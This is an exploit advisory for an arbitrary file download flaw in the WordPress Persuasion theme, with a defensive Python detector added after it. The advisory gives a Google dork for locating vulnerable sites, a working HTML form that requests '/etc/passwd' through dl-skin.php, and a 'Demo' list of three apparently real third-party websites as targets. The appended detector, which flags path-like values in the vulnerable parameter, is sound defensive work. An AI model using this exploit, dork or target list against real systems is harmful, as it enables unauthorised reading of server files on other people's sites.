
WordPress Theme Persuasion Arbitrary File Download Vulnerability

Author: CrashBandicot, Published: 08-07-2014
	

############################################################################

# Title : WordPress Theme Persuasion Arbitrary File Download Vulnerability

# Author : CrashBandicot

# Date : 08/07/2014

# Email: ccrashbandicot@gmail.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/themes/persuasion/

# Tested on : Windows

############################################################################



Exploit:

<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value="Download">
</form>
</body>
</html>
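
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it flags requests to dl-skin.php whose _mysite_download_skin value looks like a file path. The helper names, the verdict strings and the rule that a legitimate value is a bare file name are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter name are taken from the advisory's form.
ENDPOINT = "/wp-content/themes/persuasion/lib/scripts/dl-skin.php"
PARAM = "_mysite_download_skin"

# Assumption: a legitimate skin name is a bare file name, so a path
# separator, parent reference, drive letter or NUL byte raises an alert.
PATHLIKE = re.compile(r"[/\\]|\.\.|^[A-Za-z]:|\x00")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e -> ..)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(url, body=""):
    """Return None (other endpoint), 'endpoint-hit' or 'path-in-parameter'."""
    parts = urlsplit(url)
    if not fully_decode(parts.path).lower().endswith(ENDPOINT):
        return None
    # The advisory uses POST; the query string is checked as well in case
    # the script reads the value from either place (assumption).
    fields = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        fields.setdefault(key, []).extend(values)
    for value in fields.get(PARAM, []):
        if PATHLIKE.search(fully_decode(value)):
            return "path-in-parameter"
    return "endpoint-hit"


# Constructed sample requests (URL, form body); not real traffic.
SAMPLES = [
    ("http://127.0.0.1" + ENDPOINT, "_mysite_download_skin=%2Fetc%2Fpasswd"),
    ("http://127.0.0.1" + ENDPOINT, "_mysite_download_skin=%252Fetc%252Fpasswd"),
    ("http://127.0.0.1" + ENDPOINT, "_mysite_download_skin=blue-skin"),
    ("http://127.0.0.1/wp-login.php", ""),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, body, "->", classify(url, body))
```

The input is a URL plus the decoded request body, so it needs a source that records POST bodies, such as a WAF or reverse-proxy audit log; a plain access log only supports the 'endpoint-hit' verdict.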


Demo:
http://anchormediastudio.com/
http://sti-informatique.ca/
http://www.zevendesign.com/


Sh00tz to : All my Friends